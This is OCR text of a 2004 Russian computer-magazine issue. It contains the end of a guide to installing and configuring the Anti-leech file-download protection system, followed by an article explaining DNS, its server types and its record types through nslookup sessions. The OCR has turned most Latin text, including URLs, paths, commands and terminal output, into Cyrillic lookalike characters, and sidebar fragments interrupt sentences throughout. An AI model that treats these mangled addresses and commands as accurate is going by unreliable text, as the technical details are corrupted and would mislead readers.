рый будет установлена система аЫі-ІеесН. 

Он должен быть виден из интернета по ад- 
ресу ІІгІ/РаіІі_іо_РиЫіс_сІігесіогу. 

а Ргіѵаіе сіігесіогу - содержит дополни- 
тельные скрипты и библиотеки, которые 
нужны системе. В нем же хранятся пакаджи, 
созданные тобой. 

Жмем на кнопку и попадаем на страничку 
проверки конфигурации сервера и наличия 
всех необходимых библиотек. Идем по ссыл- 
ке Іііф://тусооІ$іІе.ги/аІіп5ІаІІ/сІіеск_регІ.рІ. 

Скорее всего, скрипт скажет, что у тебя 
не хватает модуля ХМІ_::ООМ. У меня именно 
так и произошло. Ничего страшного. Слива- 
ем ІЬѵѵіп.іір (если под никсами не хватает 
библиотек, то качаем едиігесІ-ипіхТаг.ді и 





ѵѵѵуѵу.ріхеіѵіеѵу.гіі 



МѴЮІА® СіпеРХ™ 3.0 ТесИпоІоду 
ЫѴЮІА® ШгаЗИасІоѵ/™ II ТесРіпоІоду 
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ХПКЕР/№09(69)/2004 




л Для того чтобы 
добавить пак вмес- 
те с шаблоном для 
него, достаточно 
поместить в ката- 
лог ргіѵаіе/ітрогі 
файл самого пака 
(с расширением 
АІ.Р) и файл шаб- 
лона, имеющий та- 
кое же имя и рас- 
ширение *.НІтІ. 




л Если устанавли- 
ваешь систему под 
ШХ, то не забудь 
прописать скрип- 
там права 755: 
сіітосі 755 аііп- 
5ІаІІ/*.рІ 




л Не забудь сте- 
реть установочный 
каталог аііпзіаіі. 
Это общая реко- 
мендация. Если 
ставишь какие-ли- 
бо скрипты, будь 
то форумы, госте- 
вые, галереи и 
прочее, сразу пос- 
ле установки сотри 
установочные фай- 
лы. Они являются 
лакомым кусочком 
для взломщика. 



гециігесі-ррт.іір). Распаковываем и перепи- 
сываем содержимое директории І_іЬ архива в 
каталог /Иоте/тусооІзііе.ги/ѵѵѵѵѵѵ\. .\ргіѵаІе\ІіЬ 
на сервере. Обновляем страничку в браузе- 
ре. Когда все модули установлены (их всего 
8), переходим ко второму шагу - установке 
администраторского пароля. 
Шр://тусооІ$ііе.ги/аІіп$іаІІ/пеѵѵ_ассоипі.р1 . Аккаунт 
админа создан. Наконец, можно взглянуть, 
какие же услуги предоставляет только что 
установленная система: Мр://пусооІ$ііе.ги/риЫіс. 

А РОБОТПЕН С СИСТЕМОЙ 

После авторизации ты попадаешь в главное 
меню администрирования системы. Давай 
создадим пакадж тураск. Для этого нажима- 
ем «Иеѵѵ» и вводим название для нового па- 
каджа. После этого попадаем в панель ре- 
дактирования. 

ТШе - название пака. Оно будет появ- 
ляться в заголовке окошка с плагином, когда 
пользователь будет скачивать твой стаф. 

Веіегег - адрес страницы, на которой ты 
разместишь линк на свое добро. Допустим, 
ты разрешил своему другу поместить ссылку 
на твои файлы с его сервера ѵѵѵѵѵѵ.ѵазуа.ги. Ес- 
ли ты пропишешь в этом поле строку 
Шр://ѵа$уа.ги/сІоѵѵпІоасІ, то любая страница, рас- 
положенная в пределах этого пути 
(Шр://ѵа$уа.гиДІоѵѵпІоафсооІ/ или Шр://ѵа$уа.ги/сІ(мп- 
ІоасІ/$ира$М/геаІІусооІ), будет считаться допус- 
тимой и скрипт разрешит загрузку. 

АсІсІ пеѵѵ геіегег - имеет точно такой же 
смысл и позволяет добавить несколько до- 
пустимых ШІ_’ов. Чтобы удалить ІІПІ_, от- 
меть его галкой справа. 

ЫТеііте - время жизни пака. Когда оно 
истечет, юзер увидит надпись «Раскаде Тііе із 
соггиріесі». Это значит, что придется обно- 
вить страницу для того, чтобы плагин полу- 
чил новую версию пака. Время жизни уста- 
навливается в днях, часах, минутах. Напри- 
мер, «36» значит 3 дня, а «1 т» - одну мину- 
ту. Если поле оставить пустым, время жизни 
будет неограниченным. 

ВеэсгатЫе регіосі - период, после ко- 
торого пак будет заново собран (читай за- 
шифрован). Формат поля такой же, как и в 
имейте, и его также можно оставить пустым. 
Авторы Антилича рекомендуют устанавливать 
значение чуть меньше, чем время жизни. 

Вероіі сіоѵѵпіоасі Іо - адрес скрипта, соби- 
рающего статистику по закачкам. По умолча- 
нию это Шр://пусооІ$ііе.ги/риЫісШ$Ыаі$.рІ. Если не 
заполнять - статистика собираться не будет. 

Роѵѵпіоас] Іетріаіе - шаблон странички, 
выдаваемой скриптом боѵѵпіоаб.рі. Я про не- 
го уже сказал чуть раньше. Для каждого пака 
можно установить свой шаблон. Единствен- 
ное условие - он должен содержать в себе 
ссылки на плагин и, собственно, сам пак. 

Как создавать свои шаблоны, подробно опи- 
сано в хелпе, включенном в систему. 

Ооѵѵпіоас) зоигсе Ьазе - префикс, кото- 
рый будет автоматически добавлен к имени 



каждого файла, входящего в пак. Это удоб- 
но, если пак включает несколько файлов, ле- 
жащих в одной папке. Например, если в ка- 
талоге Шр://йегету$Мі$/ти$іс/ лежат йіеі .трЗ, 
Й1е2.тр3 и ТіІеЗ.трЗ, то префиксом может 
служить путь до каталога. Сами файлы не 
должны находиться на одном сервере с Ан- 
тиличем. Если нарушить это условие, плагин 
выдаст ошибку «Нозі поі ТоипсІ». 



нием паков браузер все равно обращается к 
серверу, где физически расположены защища- 
емые файлы. Что это значит? Правильно! Даже 
простенький снифер поможет какому-нибудь 
сильно умному кренделю узнать реальное рас- 
положение файлов и, в итоге, свести на нет 
все твои старания. Авторы, в общем-то, и не 
скрывают такой возможности. Более того, они 
играют на этом, предлагая скачать и устано- 



Можно создавать паки вручную, 
без использования скрипта. 



Дальше расположены поля информации о 
самих файлах. 

ТШе - название, которое будет появлять- 
ся в клиентском плагине слева. 

Нгеі - имя оригинального файла. К этому 
имени слева будет приписан ЭоѵѵпІоасІ 
зоигсе Ьазе. 

Кепате - такое имя получит файл, когда 
будет загружен на клиентскую машину. 

Кроме описанного, есть еще способ для 
особо продвинутых. Можно создавать паки 
вручную, без использования скрипта. Для 
этого тебе нужно в обычном текстовом ре- 
дакторе создать файл в формате ХМ1_ (син- 
таксис описан в хелпе), поместить его в пап- 
ку ргіѵаіе/ітроіі (можно вместе с соответ- 
ствующим ему шаблоном) и выполнить ко- 
манду «Ітроіі». 

Пак, созданный тобой, будет доступен для 
скачивания по адресу 
Шр://пусооІ$ііе.ги/риЫіс/гіо№пІоа(1.рІ?раскаде=пураск. 

Ты можешь редактировать уже созданные 
или импортированные паки. Процесс крайне 
прост: выбираешь пак из списка и жмешь на 
кнопку. Диалог редактирования такой же, как 
и диалог создания пака. Можно добавлять и 
удалять файлы, а также менять список раз- 
решенных рефереров ( НТТР- РеТегег ) . 

Удаление пака, изменение пароля адми- 
нистратора и доступ к статистике, думаю, не 
требуют пояснений. Кроме этого, есть функ- 
ция бэкапа и восстановления паков вместе с 
шаблонами, которые им соответствуют. Для 
того чтобы создать резервную копию, доста- 
точно слить с сервера всю директорию ргі- 
ѵаіе/раскадез. Процесс восстановления зак- 
лючается в копировании паков в каталог ргі- 
ѵаіе/ітроіі с последующим выполнением ко- 
манды «Ітроіі». Вот, пожалуй, и все, что ка- 
сается особенностей работы с системой. 

А НЕСКОЛЬКО СЛОВ 
0БЕ30П0СН0СТИ 

Не стоит ожидать чуда от Антилича. Ты навер- 
няка обратил внимание, что после выполнения 
всех операций с шифрованием-расшифрова- 



Кроме этого, есть функция бэкапа и 
восстановления паков вместе с 
шаблонами, которые им соответствуют. 



вить свой собственный менеджер закачек 
№1Ритрег, умеющий выдергивать реальные 
адреса файлов. Тем не менее, от банального 
копи-паста ссылки на файл эта технология 
спасает. И довольно неплохо. Так что польза, 
безусловно, есть. Качать теперь будут только 
те, кто действительно очень этого хочет. Твоим 
посетителям придется перенастраивать файр- 
вол, если тот блокирует НТТР-ВеТегег (доволь- 
но распространенная ситуация), внимательно 
следить за тем, чтобы в браузере корректно 
исполнялись баѵа-апплеты, и... да много за 
чем еще придется следить. У меня, к примеру, 
не сразу получилось скачать файл с помощью 
собственноручно настроенного Антилича. Бра- 
узер - Опера последней версии, баѵа включе- 
на, геіегег передавался, но плагин даже гру- 
зиться не хотел. Помог только форум на апіі- 
Іеесіі.сот. Оказалось, что для корректной работы 
плагина необходимо, чтобы Опера идентифи- 
цировалась именно как Опера, а не как ІЕ (а в 
последних версиях этого браузера по умолча- 
нию ставится ІЕ). После настройки Оперы 
(Тооіз - Ргеіегепсез - ІМеіѵѵогк - Вгоѵѵзег 
Ісіепіііісаііоп) получилось. Посетитель - человек 
ленивый, что-то там настраивать он будет 
только в крайнем случае, поэтому тебе при- 
дется выбирать между посещаемостью сайта и 
экономией трафика. 



А ТХЕ ЕНД 



Если ты всерьез озабочен проблемой воров- 
ства, то файлы, предназначенные для скачи- 
вания, пользователь вообще не должен ка- 
чать напрямую (а в Антиличе все именно к 
этому и сводится). Содержимое файла дол- 
жен выдавать специальный скрипт, который 
и будет проверять рефереры и другие усло- 
вия. Либо же - думаю, это более грамотный 
способ - условия должны проверяться на 
уровне веб-сервера с использованием стан- 
дартных методов аутентификации. Но это 
уже совсем другая история. А на сегодняш- 
ний день, как показывает практика, система, 
описанная мною, вполне справляется со сво- 
ими задачами, так что рекомендую исполь- 
зовать именно ее. Удачи тебе, толстых кана- 
лов и дешевого трафика! ЗС 
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правда о доменным именок 



ривет, дружище! Я уверен, что ты, как и любой продвинутый перец, каждый день заходишь на сайт 62.2 1 3.7 1 .2 1 7. Как это не 
заходишь? Ну да, точно, тебе же не нужно виесто красивого адреса ѵшѵоакер.ги запоминать эти дурацкие циферки. Ну что же, 
поздравляю! Ты продвинутый, потому что, сам того не подозревая, пользуешься замечательной штукой - НИЗ. Именно она 
автоматически превращает текстовую строчку, которую ты набираешь в браузере, в ІР-адрес, по которому и обращается твой компьютер, 
чтобы ты мог вечерком посмотреть на голых тет... т.е. без труда почитать свежие новости. Я расскажу тебе сегодня о службе ЯИЗ. 
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А ТЫ помнишь, 

КОК ВСЕ НОЧіАіППОСЬ? 

О авным-давно, во времена сети 
АВРАІМЕТ имена компьютеров 
хранились в одном текстовом 
файле, который лежал на од- 
ной машине, обновлялся вруч- 
ную, а затем рассылался на 
все компьютеры в сети. 

Но сеть увеличивалась, файл 
распухал, и совсем скоро стало 
ясно, что содержать и пересылать такой гиган- 
тский объем информации очень неудобно. Да 
и медленно все это. И вот в первой половине 
80-х годов четверо прыщавых очкар... т.е. ум- 
ных аспирантов университета Беркли занялись 
реализацией распределенной системы, кото- 
рая смогла бы поддерживать и динамически 
обновлять информацию об именах компьюте- 
ров в сети. Итогом этой работы стал пакет 
программ В№ (Вегкіеу Іпіегпеі Мате Оотаіп), 
реализованный для ІІІІМХ-систем. Кстати, 
именно от названия этой программы пошло 
сленговое слово «забиндить». Теоретическая 
основа для создания этой системы была про- 
думана чуть раньше и отражена в РРС882 и 
ВРС883. А спустя 4 года появились еще два 
документа: ВРС1034 и ВРС1035. Они до сих 
пор остаются базовыми описаниями ОМЗ. 



А о но фиг оно надо? 

Итак, что же определяет система ЭІМЗ? А вот 
что: 

л иерархически организованное простран- 
ство имен компьютеров, то есть то, как уст- 
роены и как соотносятся друг с другом име- 
на машин; 

л таблицу имен компьютеров в виде расп- 
ределенной базы данных; 

л библиотеку функций, осуществляющих 
запросы к базе; 

л средства маршрутизации электронной 
почты; 

л протокол обмена информацией между 
серверами РИЗ; 

Хосту, подключенному к интернету, систе- 
ма ЭИЗ нужна для полноценного участия в 
работе Сети. У тебя не найдется винта на 
пару терабайт, чтобы хранить имена всех 
компов в инете? А гигабитный канал, чтобы 
иногда эту инфу обновлять? Жаль. Тогда те- 
бе придется юзать ЭМЗ. Как и всем, 
собственно :). 

Любая организация, имеющая свой сер- 
вер, так или иначе должна хранить свой ку- 
сочек информации об именах машин. Все 
вместе они составляют всемирную базу 



□N3. Эта информация хранится как мини- 
мум в двух текстовых файлах. Файлы состо- 
ят из строчек (записей). Каждая запись име- 
ет свой тип и состоит из нескольких полей. 

К примеру, строки ітд ІИ А 
213.180.194.65 и М МХ67 тхі .уапбех.ш в 
файле зоны прямого преобразования и стро- 
ка 65 ІИ РТВ ітд.уапсіех.ги в файле зоны об- 
ратного преобразования говорят о том, что 
между именем ітд.уапсіех.ги и адресом 
213.180.194.65 установлено соответствие. 

ЭІМЗ - это так называемая клиент-сервер- 
ная система. Это значит, что часть компью- 
теров являются серверами и хранят у себя в 
памяти информацию об именах компов, а 
также предоставляют ее по запросу осталь- 
ным машинам (клиентам). Клиентами могут 
являться как хосты из внутренней сети, так и 
внешние компьютеры, не входящие в струк- 
туру домена, который обслуживается серве- 
ром. Давай поговорим об этом подробнее. 

Все пространство имен ЭИЗ имеет древо- 
видную структуру и называется деревом до- 
менов. Корнем дерева является точка. Из 
корня «вырастают» домены первого уровня 
(ВІІ, СОМ, ИЕТ, ІМРО и т.д.). У них, в свою 
очередь, есть свои «дети»: уапбех.ги, ісцхот, 
ріір.пеі и т.д. Одна половина дерева доменов 
содержит сведения для преобразования 
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имен в ІР-адреса, а другая, наоборот, - ІР- 
адресов в имена хостов. В первом случае го- 
ворят о прямом преобразовании, а во вто- 
ром - об обратном. Соответствующие назва- 
ния носят и файлы: файл зоны прямого и 
обратного преобразования. 

По идее, чтобы указать, что доменное имя 
является абсолютным, а не связанным с не- 
которым доменом, отличным от корневого, в 
конце имени нужно ставить точку. Если твоя 
машина имеет имя «зегѵак» в домене 
ботаіп.ги и существует хост уа.гУотаіп.ги (вот 
такое длинное имя - домен четвертого уров- 
ня), то запрос с твоей машины по адресу 
уа.ги приведет вовсе не на сервер Яндекса, 
а на хост «уа.ги.сіопаіп.ги». Чтобы попасть на 
настоящий сервер Яндекса, нужно писать 
«уа.ги.» (с точкой в конце). Но такая ситуация 
с конфликтами доменных имен крайне мало- 
вероятна, в особенности для обычного поль- 
зователя. Поэтому на точку почти всегда за- 
бивают. 

Один компьютер может иметь несколько 
имен. К примеру, имена зегѵег.сот и мшегѵ- 
ег.сот имеет одна и та же машина. Вообще, 
называть хосты в соответствии с теми функ- 
циями, которые они выполняют, - очень 
распространенная практика: ѵѵѵѵѵѵ.зегѵег.сот, 
Лр.зегѵег.сот, таіі.зегѵег.сот. Кроме того, бывает 
так, что одно и то же имя соответствует (ре- 
золвится) разным адресам. К примеру, имя 
пхі.уапсіех.ги имеют несколько разных серве- 
ров. Это сделано для того, чтобы распреде- 
лить нагрузку между всеми компьютерами и 
избежать обвала сервера под шквалом обра- 
щений к нему. 

А девушки Бывают РОЗНЫЕ 

Сейчас я расскажу о том, какие бывают 
ОЫЗ-серверы и какие функции они могут вы- 
полнять. Серверы различаются по источнику 
данных (авторитетный, кэширующий, глав- 
ный, подчиненный), пути прохождения зап- 
роса (переадресующий), типу выдаваемого 
ответа (рекурсивный, нерекурсивный) и нес- 
кольким другим параметрам. 

В каждой зоне (зоной называется домен 
без своего поддомена) обязательно должны 
присутствовать как минимум два сервера. 

Эти серверы называются авторитетными. 
Администратор домена заносит в них инфор- 
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В информации о делегированном домене обязатель- 
но присутствуют два РМ8-сервера 



мацию об именах машин внутри зоны (грубо 
говоря, о всех компьютерах с адресами бла- 
бла-бла.имя.ком), и эта информация приз- 
нается официальной и единственно правиль- 
ной. Отсюда и название - авторитетный. 
Один из серверов получает статус главного. 
Именно его база корректируется, когда ад- 
мину надо добавить или изменить какие-ни- 
будь хосты внутри домена. Второй сервер 
обязательно подчиненный. Он хранит точную 
копию базы с первого сервера и нужен для 
повышения надежности. Если главный сер- 
вер почему-то недоступен, обращения идут к 
подчиненному. Админу нет необходимости 
вручную корректировать базу подчиненного 
сервера. База сама периодически обновля- 
ется с главного сервера посредством прото- 
колов БЫЗ. Такая операция называется зон- 
ной пересылкой. 

ОМЗ-серверы должны уметь выдерживать 
огромные нагрузки. Например, на серверы 
доменов первого уровня (типа ВІІ) приходят 
десятки тысяч запросов в секунду. А на кор- 
невые (эти 1 3 серверов - популярнейшая 
мишень хакерских атак) - и того больше. 

Чтобы им свободнее дышалось, были 
придуманы кэширующие сервера. Их функ- 
ция такая же, как у кэш-памяти в компе. Кэ- 
ширующий сервер загружает адреса серве- 
ров корневого домена из файла, а все ос- 
тальные данные получает сам, накапливая 
ответы на выдаваемые им запросы. Когда 



такой сервер получает запрос, он сначала 
смотрит, нет ли у него в буфере ответа. Ес- 
ли есть, то он выдает этот ответ, если же 
нет - обращается к корневым серверам, что- 
бы получить информацию у них. 

У каждого домена в его зонных данных 
обычно присутствует информация о ОІМЗ- 
серверах для каждого его поддомена. Такая 
структура позволяет РЫЗ-клиентам опускать- 
ся по цепочке серверов от самого крупного к 
самому мелкому в поисках какого-либо узла. 
Посмотри, как можно было бы искать домен 
таіі.уапсіех.ги. Сначала мы могли бы опросить 
корневой сервер, он переслал бы нас к од- 
ному из серверов домена ПІІ. Тот, в свою 
очередь, отправил бы нас к серверам доме- 
на уапбех.ш (пзі.уапсіех.ги, п$2.уапсіех.ги, п$3.уап- 
бех.ги), которые и дали бы нам адрес таіі.уап- 
сіех.ги (213.180.194.65). 

Серверы бывают рекурсивными и нере- 
курсивными. Если нерекурсивный сервер 
располагает информацией о запрашиваемом 
имени, он дает соответствующий ответ. В 
противном случае такой сервер вернет кли- 
енту отсылку на авторитетные серверы, ко- 
торые знают (или должны знать) ответ. Кли- 
ент в этом случае должен уметь распознать 
ссылку на другой сервер и послать свой зап- 
рос ему. Такие пересылки могут происходить 
до тех пор, пока мы не найдем, наконец, 
нужный сервер. Рекурсивный сервер осво- 
бождает нас от обязанности скакать по сер- 
верам в поисках удовлетворяющего ответа. 
Он сообщает только реальные ответы либо 
говорит, что хост не может быть найден. Он 
сам найдет подходящий сервер, возьмет от- 
вет у него и отошлет нам. Но за такие удоб- 
ства приходится платить. Во-первых, проце- 
дура обработки запроса становится дольше, 
а во-вторых, в локальном кэше сервера на- 
капливается туева хуча ответов промежуточ- 
ных серверов. 

А КОК ЭТО ВСЕ РПБОТПЕТ 

Все серверы, как минимум, должны знать 
адреса и имена корневых серверов, кото- 
рые, в свою очередь, знают о доменах пер- 
вого уровня ВІІ, СОМ, ІМЕГ, ОВО и других. 
Сервер домена ВІІ знает о существовании 
домена хакер. ш, сервер домена СОМ знает 
о домене ІіѵеіоигпаІ.соп. Каждая зона может 
делегировать (то есть передавать) полномо- 
чия по управлению своими поддоменами 
другим серверам. 

Приведу реальный пример. Нам необхо- 
димо узнать адрес сервера ітд.уапсіех.ги (у Ян- 
декса действительно есть отдельный сервер, 
оптимизированный для хранения картинок). 
Предположим, что в кэше нашего ЭЫЗ-сер- 
вера никаких данных об ітд.уапсіех.ги нет. 
Наш локальный ОЫЗ-сервер обращается к 
корневому серверу. Корневой сервер отп- 
равляет нас к серверу зоны ВІІ, в которой 
находится запрашиваемый адрес. Сервер 
зоны ВІІ определяет по своей базе, что до- 
мен уапсіех.ги является делегированным и вся 
информация по его субдоменам хранится в 
ЭЫЗ Яндекса (пзі.уапсіех.ги и другие), 
а не у него самого (как было бы в случае от- 
сутствия делегирования), и отправляет нас к 
соответствующим серверам. И только после 
этого пзі.уапсіех.ги дает ответ, что адресом 
ітд.уапсіех.ги является 213.180.193.30. 

Я уже говорил тебе про кэширование зап- 
росов. Сначала кэшировались только поло- 



ОИЗ-серверы должны уметь 
выдерживать огромные нагрузки. 

С истема доменных имен (Ооплаіп Ыапле Зузіепл) выполняет 
многие задачи, но основная ее функция - преобразование 
имен компьютеров в ІР-адреса и наоборот. В умных книжках 
0Ы5 называют «распределенной базой данных». Это значит, что 
сведения о компьютерах в Сети хранятся на многих серверах, 
которые автоматически обмениваются друг с другом информа- 
цией. Протокол, по которому происходит этот обмен, также но- 
сит название ОЫ5. 




Пара ссылок, кото- 
рые тебе пригодят- 
ся. 

л ВШЭ: Шр://ісІ5а. 
ігіза. Іг/сді-Ьіп/ 
Ьіпсі/ІіИр/$оигсе/РАСІ 
^N8: 
ѵѵѵѵѵѵ.сіпз.пеі 




^тм.гіс- 
есіііог.огд 
основные номера 
ПРО, с которыми 
стоит познакомить- 
ся: 1034, 1035, 
1995, 1996, 2136, 
2181,2308. 
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жительные ответы, т.е. связанные с сущест- 
вующими именами и адресами хостов. Но 
относительно недавно, в 1 998 году, умные 
дядьки предложили кэшировать еще и отри- 
цательные ответы - информацию о том, что 
тех или иных хостов не существует в приро- 
де. Это резко снизило количество обраще- 
ний к корневым серверам, которые генери- 
ровались благодаря некоторым людям, у ко- 
торых руки с бодуна тряслись или кнопка за- 
липала. После этого локальные серверы сра- 
зу стали отвечать, что адреса хаккккер.ш не 
существует в природе, а юзеру пора бы ку- 
пить новую клаву. 

Л ДОПРПШИВЯЕН 0И8-СЕРВЕР 

Для большинства пользователей вся эта кол- 
басня с запросами, ответами, пересылками 
и прочими резолвами (гезоіѵе - операция 
конвертации доменного имени в ІР-адрес) 
остается вне поля зрения. Операционная 
система следит за адекватным преобразова- 
нием адресов, и редко какое приложение са- 
мо обращается к ОИЗ-серверу. Реализация 
клиентской части ЭМЗ уже давно стала 
частью стека протоколов ТСР/ІР в операци- 
онках. Но иногда приходится узнавать кое- 
какие сведения о ЭИЗ. В частности, они бы- 
вают крайне полезны при анализе удаленных 
хостов и сетей и позволяют пролить свет на 
их структуру и внутреннее устройство. Как и 
под Винды, под Никсы существует малень- 
кая консольная программа пзіоокир. Око- 
шечная версия, судя по всему, была перед- 
рана с никсовой (правда, как обычно, не до 
конца), потому что интерфейс у них ну очень 
похож. 

У программы есть два режима работы: ко- 
мандный и интерактивный. Первый исполь- 
зуется, когда тебе просто нужно узнать ІР 
хоста по его имени. 

Сначала программа сообщает свои теку- 
щие настройки. Зегѵег - ЭМЗ-сервер, к кото- 
рому она будет обращаться за информаци- 
ей, п$1.ті$р.ги - основной сервер моего про- 
вайдера, а 10.22.10.20 - его адрес. 

Строка «Моп-аиШогйайѵе апзѵѵег» говорит 
о том, что данные берутся из какого-то про- 





РОСШИРЕННЫЙ ПРОТОКОЛ 0№ 



О ригинальная версия ОЫ5 предполагала использование про- 
токола СЮР для запросов и ответов типа «клиент-сервер» и 
протокола ТСР для зонных пересылок. Стандартный макси- 
мальный размер ІЮР-пакета, который понимают все реализа- 
ции ЭИЗ, составляет 512 байт. Это не позволяет использовать 
громоздкие системы шифрования, помещающие в каждый па- 
кет цифровую подпись внушительного объема. По той же при- 
чине количество корневых серверов ограничено 13, а длина их 
имени - одной буквой. Они, кстати, называются Х.ПООТ- 
5ЕРѴЕР5.ЫЕТ (вместо X подставь первые 13 букв латинского 
алфавита). Первым шагом для обхода этих ограничений стала 
процедура повторного запроса по протоколу ТСР, если в ІЮР- 
пакете вся информация не помещается. Совсем отказаться от 
ІЮР было бы слишком накладно из-за двойной избыточности 
при обмене по ТСР (семь пакетов вместо двух для обычной опе- 
рации «запрос-ответ»). 

В конце 90-х годов появился протокол ЕЭЫ50 (Расширенный 
ОЫЗ, версия 0). Он позволял двум хостам договориться о раз- 
мере пакетов и некоторых других параметрах, возвращаясь к 
стандартному протоколу в случае неудачи, но всех проблем все 
равно не решил. 



• Гораздо больше информации можно 
полунить, используя пзіоокир 
т в интерактивном режиме. 



межуточного кэширующего сервера, скорее 
всего, из самого п$1.ті$р.ги. Далее идут запро- 
шенное нами доменное имя и собственно 
адрес. Все очень просто. 

Гораздо больше информации можно полу- 
чить, используя пзіоокир в интерактивном 
режиме. Для этого запускаем программу без 
параметров и первым делом говорим ей: «?». 

В первую очередь нас интересует команда 
«зеі Іуре». Она определяет тип информации, 
которую мы будем добывать. 

Какие же типы записей бывают в зонных 
файлах сервера? Есть четыре основных типа, о 
которых читай ниже. 

^ ТИП ПЕРВЫЙ, зонные записи 

Запись типа ЗОА (Зіаіі ОТ АиТІіопТу - начало 
полномочий) определяет начало зоны - груп- 
пы записей о ресурсах, расположенных в од- 
ной области пространства имен. Для каждой 
зоны создается своя запись типа ЗОА, кото- 



рая содержит имя зоны, ее порядковый но- 
мер, почтовый адрес администратора доме- 
на и главный ОМЗ-сервер зоны. Порядковый 
номер исполняет роль уникального иденти- 
фикатора и служит для корректного обновле- 
ния информации о зоне на других серверах. 

Адрес администратора записывается че- 
рез точку, а не через собаку (зузасітіп.уапсіех.ги). 
Кроме этого, запись содержит значения ин- 
тервалов времени, определяющие, как долго 
данные могут находиться в кэше других сер- 
веров и вообще путешествовать по Сети без 
обновления. Это нужно для постоянного об- 
новления данных, распределенных по всей 
Сети. Если ты пробовал регистрировать 
новый домен, тебе наверняка сказали о 
том, что домен станет доступен в течение 
суток. Это время как раз и нужно для того, 
чтобы данные успели расползтись по всем 
уголкам Сети и все знали, что появился но- 
вый сайт $ирапедасооІѵѵаге 2 рогпо(гееіпеісІаѵегуЬе$ісІо- 
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таіпіпсІажІсІЬугеаІішгогѵазуа.ги. Пройдет некото- 
рое время и... ага, ни фига не изменится, 
потому что максимальная длина имени зоны 
(от точки до точки) не может превышать 63 
байта. 



Основные серверы домена уапсіех.ш 



> $еі іуре=№ 

> уап(1ех.ги 
Зегѵег: п$1.ті$р.ги 
АсІс1ге$$: 10.22.10.20 
ііоп-аиіііогііаііѵе ап$ѵѵег: 
уапсіех.ги пате$егѵег = пзі.уапсіех.ги 
уап(1ех.ги пате$егѵег = п$2.уап(1ех.ги 
уапсіех.ги пате$егѵег = п$3.уапс!ех.ги 
уапсіех.ги пате$егѵег = п$.і$рт.ги 
п$2.уапс!ех.ги іпіегпеі ас!с]ге$$ = 213.180.199.34 
п$3.уапс!ех.ги іпіегпеі асІсІге$$ = 213.180.193.2 

Записи N5 (Мате Зегѵег) определяют основ- 
ные серверы имен для зоны. Видишь, у Яндек- 
са целых четыре основных сервера для домена. 

А ТИП ВТОРОЙ. БПЗОВЫЕ ЗОПИСИ 

Запись типа А. Она выполняет самую извест- 
ную функцию - предобразование доменного 
имени в ІР-адрес. В общем-то, то же самое, 
что и при командном режиме работы. 



Преобразование ІР в доменное имя 



> $еі іуре=РТК 

> 213.180.216.200 
Зегѵег: п$1.ті$р.ги 
Ас1с1ге$$: 10.22.10.20 
№п-аиіІіогііаііѵе ап$ѵѵег: 

200.216.180.213.іп-ас1сІг.агра пате = ѵта.уапОех.ги 
216.180.213.іп-асІ(]г.агра пате$егѵег = п$2.уапс!ех.пеі 
216.180.213.іп-асІ(]г.агра пате$егѵег = п$1.уапс!ех.пеі 

РТВ - это очень хитрый тип записей. Он 
позволяет преобразовать ІР-адрес в домен- 
ное имя. Чтобы не выбиваться из общей 
концепции устройства ОІМЗ (древовидной 
структуры, распределенности и т.д.) и не пе- 



ребирать все дерево доменных имен интер- 
нета в поисках имени, которому приписан 
интересующий нас ІР-адрес, был придуман 
специальный домен іп-асісіг.агра. Хосты в 
нем именуются очень похоже на ІР-адреса, 
только в обратную сторону. К примеру, ІР- 
адресу 216.239.37.25 будет соответствовать до- 
мен 25.37.239.216.іп-асі(іг.агра, информация о кото- 
ром хранится в ОІМЗ-серверах внешнего до- 
мена 37.239.216.іп-асІсІг.агра. И уже они, серверы 
внешнего домена, определяют, что поддоме- 
ну с именем «25» (то есть ІР-адресу 
216.239.37.25) соответствует имя $пір2.доодІе.соп. 



Путь прогулки электронной понты 



> $еі іуре=МХ 

> геаі.хакер.ги 
Зегѵег: п$1.ті$р.ги 
Ас1с1ге$$: 10.22.10.20 
Моп-аиіііогііаііѵе ап$ѵѵег: 

геаі.хакер.ги МХ ргеТегепсе = 20, таіі ехсііапдег = $тір.дате- 
ІапО.ги 

геаі.хакер.ги МХ ргеТегепсе = 10, таіі ехсііапдег = ро$і.дате- 
ІапО.гті-пеіти 

хакер.ги пате$егѵег = п$4.піс.ги 
хакер.ги пате$егѵег = пз.датеІапО.ги 

Записи типа МХ описывают маршруты дви- 
жения электронной почты. Когда ты посыла- 
ешь письмо на адрес падагіпеФгеаІ.хакер.ги, твой 
сервер исходящей почты сначала обращается 
к ОІМЗ’ам домена хакер.ги, чтобы узнать ІР-ад- 
рес сервера, принимающего почту для адре- 
сов @геаІ. хакер.ги. За это и отвечают записи 
МХ. Кстати, хоста геаі.хакер.ги 
в природе не существует. Т.е. у него нет ІР-ад- 
реса. А вся почта, согласно записям МХ ЭМЗ- 
сервера домена хакер.ги, поступает либо на сер- 
вер зпір.дапеіапсі.ги, либо на розі.дапеІапсІ.гпі-пеі.ги. 
И уже они обрабатывают твое письмо. Какой 
конкретно сервер выбрать для доставки, опре- 
деляет параметр «МХ ргеТегепсе» - приоритет 
узла. Сначала выбирается сервер с наимень- 
шим значением параметра. Если соединиться 



с ним не получилось, то выбирается следую- 
щий. 

А 

Протокол ЭМЗ изначально создавался откры- 
тым. Любой человек, имеющий клиентскую 
программу вроде пзіоокир, мог исследовать 
устройство зоны, порою даже получая пол- 
ный дамп ОІМЗ-базы. Для устранения этого 
недостатка был разработан механизм, назва- 
ный ТЗЮ. Он использовал симметричную 
схему шифрования и позволял организовать 
безопасное взаимодействие между сервера- 
ми. Для безопасного обмена ключами был 
создан протокол ТКЕѴ, генерирующий ключи 
для двух хостов по алгоритму обмена ключа- 
ми Диффи-Хеллмана (на третьем курсе я его 
еле выучил - прим. ред.). Чуть позже родил- 
ся протокол ЭМВЗЕС (защищенный ОІЧЗ), 
который с помощью методов шифрования с 
открытым ключом обеспечивал аутентифика- 
цию и целостность передаваемых данных. 
Все это было сделано для того, чтобы кли- 
ент мог удостовериться, что данные 
действительно поступили от владельца зоны 
и не были искажены. 

А ТИП ЧЕТВЕРТЫЙ. 
ФПКШШИВНЫЕ 
(НЕОБЯЗПТЕПЬНЫЕ) записи 

На данный момент трудно найти домен, где 
были бы указаны следующие данные: 

ЮС - географические координаты и фи- 
зические размеры объектов ОИВ. 

5НѴ - расположение основных сервисов 
внутри домена (ага, так мы тебе и сказали, 
где деньги лежат). 

^ТХЕЕНД 

На этом, пожалуй, все. Будь осторожен. За- 
частую излишнее любопытство расценивают 
как нападение. Не забывай, что твоя «опас- 
ность» для общества определяется не сум- 
